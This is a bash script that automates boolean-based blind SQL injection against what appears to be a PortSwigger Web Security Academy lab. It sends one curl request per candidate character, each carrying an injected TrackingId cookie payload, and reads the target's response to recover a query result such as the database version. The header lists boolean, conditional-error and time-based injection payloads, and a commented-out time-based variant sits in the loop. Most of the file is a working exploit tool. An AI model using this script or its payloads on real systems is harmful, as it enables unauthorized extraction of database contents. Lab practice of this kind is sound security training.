#!/bin/bash
# blind_sql.sh
# Created on: Sun 17 Oct 2021 02:35:42 AM BST
#
# ____ __ ____ __
# ( _ \ /. |( _ \/ )
# )___/(_ _))___/ )(
# (__) (_)(__) (__)
#
# Description:
# This tool is used to test for blind SQL injection. To exploit it we
# look for differences in the response: if the response differs we know
# we matched a correct pattern. There is an [EDIT] tag on the areas where
# a user needs to change the data supplied by the script.
#
# How it works (boolean-based variant, the only one active below):
# - for each output position $j (1 .. maxlength-1) and each candidate
#   character $i in $charset, one request is sent whose injected
#   condition holds only when the $j-th character of the query result
#   equals $i;
# - a response containing $truestring counts as "condition true": $i is
#   appended to $result and the next position is tried;
# - if no candidate matches at a position the script assumes the end of
#   the result has been reached and stops.
# Footprint: up to (maxlength-1) * <charset size> requests that differ
# only in the injected value — this is the pattern the target's request
# log would show.
# Note:
# $query -> stands for the query
# $j -> stands for the position of the character in the string
# $i -> is the character currently being tested
# Payloads:
# https://portswigger.net/web-security/sql-injection/cheat-sheet
# - ' AND substring(($query),$j,1)='$i
# - ' AND (SELECT CASE WHEN (SUBSTR(($query),$j,1)='$i') THEN to_char(1/0) ELSE 'a' END FROM dual)='a
# - '%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM $db_name--

# Candidate characters, space-separated on purpose: the unquoted
# `for i in $charset` below word-splits it into one candidate per iteration.
# NOTE(review): in bash, {A..z} also expands to the six ASCII characters
# between 'Z' and 'a' ([ \ ] ^ _ `), so a backslash and a backtick end up
# inside the single-quoted SQL literal of the payload.
charset=$(echo {0..9} {A..z} \. \: \, \; \- \_ \@)
URL="https://0ade00b10430eecf807cf9fe00590036.web-security-academy.net" # [EDIT] change with correct endpoint (a Web Security Academy lab host)
truestring="Giant Pillow Thing" # [EDIT] change with the string on true statements (its presence in the response body is the "true" signal)
# Upper bound on the result length. NOTE(review): the outer loop uses
# `j < $maxlength`, so positions 1..maxlength-1 are tested, i.e. at most
# maxlength-1 characters are recovered.
maxlength=30 # [EDIT] change with length of result
# Characters recovered so far, in order. It is accumulated but never
# printed; the visible output is the per-character terminal echo below.
result=""
query="SELECT @@version" # [EDIT] change with the query needed
# 1 = no candidate matched at the current position (stop); reset per position.
cut_it_off=1
echo -n "Found: "
for ((j = 1; j < $maxlength; j+=1)); do
  for i in $charset; do
    cut_it_off=1
    # Show the candidate; it is erased again below if the test fails.
    echo -n "$i"
    # [EDIT] this section can be edited below to have a curl request adapted
    # to the website you are testing. Refer to the payload section in the header of
    # this file for a payload sample.
    # One request per candidate. The pipeline's exit status (read via $?
    # below; only comments sit in between) is grep's: 0 when $truestring
    # occurs in the response body, non-zero otherwise.
    # NOTE(review): `-d` together with `-X GET` makes curl send this string
    # as the request body, whereas the commented-out time-based variant
    # below passes its payload in a Cookie header via `-H` — the two
    # variants are not equivalent. The session and TrackingId values are
    # hard-coded and belong to the [EDIT] set.
    curl "$URL" -X GET -d "session=CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D; TrackingId=v7aOHBncsO6lUJym' AND substring(($query),$j,1)='$i" -s | grep "$truestring" &> /dev/null
    # Time based sql injection section
    #time=$(/usr/bin/time -f "%e" curl "$URL" -H "Cookie: TrackingId=abc'%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END --" -s -o /dev/null 2>&1 | cut -d"." -f1)
    #if [ $time -ge 10 ]; then
    # Conditional error
    #curl "$URL" -X GET -d "session=CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D; TrackingId=v7aOHBncsO6lUJym' AND substring(($query),$j,1)='$i" -s | grep "$truestring" &> /dev/null
    if [ "$?" == "0" ]; then # Comment this to switch to time based
      result="${result}${i}"
      cut_it_off=0
      break
    else
      # Erase the candidate character just printed (backspace, space, backspace).
      echo -ne "\b \b"
    fi
  done
  # No candidate matched at position $j: treat it as the end of the result.
  if [ $cut_it_off -eq 1 ];then
    break
  fi
done
# Terminate the "Found: ..." line.
echo
exit